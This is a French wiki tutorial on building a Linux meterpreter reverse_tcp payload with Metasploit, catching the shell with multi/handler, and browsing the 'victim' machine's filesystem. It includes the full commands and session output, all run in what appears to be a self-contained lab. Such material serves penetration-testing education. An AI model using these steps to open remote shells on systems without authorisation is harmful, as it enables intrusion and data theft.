Metasploit

Metasploit est un cadriciel écrit en Ruby permettant la création et l'utilisation d'exploits. Il est disponible sous Linux et Windows. Ici nous allons juste voir la réalisation d'un reverse tcp sur une machine Linux.

Créer notre exploit

Ici on créer notre exploit qu'on mettra et exécutera sur la machine victime, on verra après comment se mettre en écoute avec msfconsole.
Pour créer notre payload, on commence par choisir celui qu'on veut, selon la plateforme et le type d'exploit(tcp,exécuter une commande, ouvrir un Shell).
pour cela on peut faire:

./msfvenom -l payloads

une fois le payload choisit, on lance la commande suivante:

toto@msftoto:~./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=10.11.160.103 X > msfpt
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
 Length: 71
Options: {"LHOST"=>"10.11.160.103"}

Dans cette commande, on rentre en paramètre notre payload choisit auparavant, on définit le LHOST qui sera la machine sur laquelle se connecter et un port (X pour se connecter sur tout les ports) et enfin on redirige ça sur un fichier qu'on exécutera.

./msfpt

Configurer msfconsole

Une fois le Payload crée, pour qu'il soit exploitable, il faut se mettre en écoute sur notre machine,celle dont le port a été définit dans notre payload. Pour cela on utilise multi/handler.
Pour cela on va utiliser l'application msfconsole.
On prend notre payload, on lui définit notre LHOST et le port si on veut pas celui par défaut, et enfin on lance l'exploit qui nous mettra en écoute.

msf > use multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.160.103
LHOST => 10.11.160.103
msf exploit(handler) > exploit
 
[*] Started reverse handler on 10.11.160.103:4444 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 10.11.160.103
[*] Meterpreter session 1 opened (10.11.160.103:4444 -> 10.11.160.103:33286) at 2015-02-04 16:42:02 +0100
 
meterpreter >

On peut constater que une fois en écoute, et l'application lancée sur la machine victime, on a réussi a se connecter dessus et a ouvrir un meterpreter.

Exploiter

Ce meterpreter va permettre d'utiliser des commandes et de parcourir le système a la recherches d’éventuelles informations:

meterpreter > cd /
meterpreter > ls
Listing: /
==========
Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40755/rwxr-xr-x   4096      dir   2015-02-03 17:02:46 +0100  bin
40755/rwxr-xr-x   1024      dir   2014-12-31 12:16:13 +0100  boot
40755/rwxr-xr-x   3660      dir   2015-02-04 16:03:16 +0100  dev
40755/rwxr-xr-x   12288     dir   2015-02-04 16:03:28 +0100  etc
40755/rwxr-xr-x   4096      dir   2015-01-23 14:46:03 +0100  home
40555/r-xr-xr-x   0         dir   2015-02-04 08:48:27 +0100  proc
40700/rwx------   4096      dir   2015-02-04 08:54:20 +0100  root
40755/rwxr-xr-x   1120      dir   2015-02-04 16:03:25 +0100  run
40755/rwxr-xr-x   4096      dir   2014-12-16 14:59:36 +0100  srv
40555/r-xr-xr-x   0         dir   2015-02-04 08:48:28 +0100  sys
wiki/metasploit.txt · Dernière modification: 2018/04/25 13:10 par root
CC0 1.0 Universal
Powered by PHP Driven by DokuWiki Recent changes RSS feed Valid CSS Valid XHTML 1.0 Valid HTML5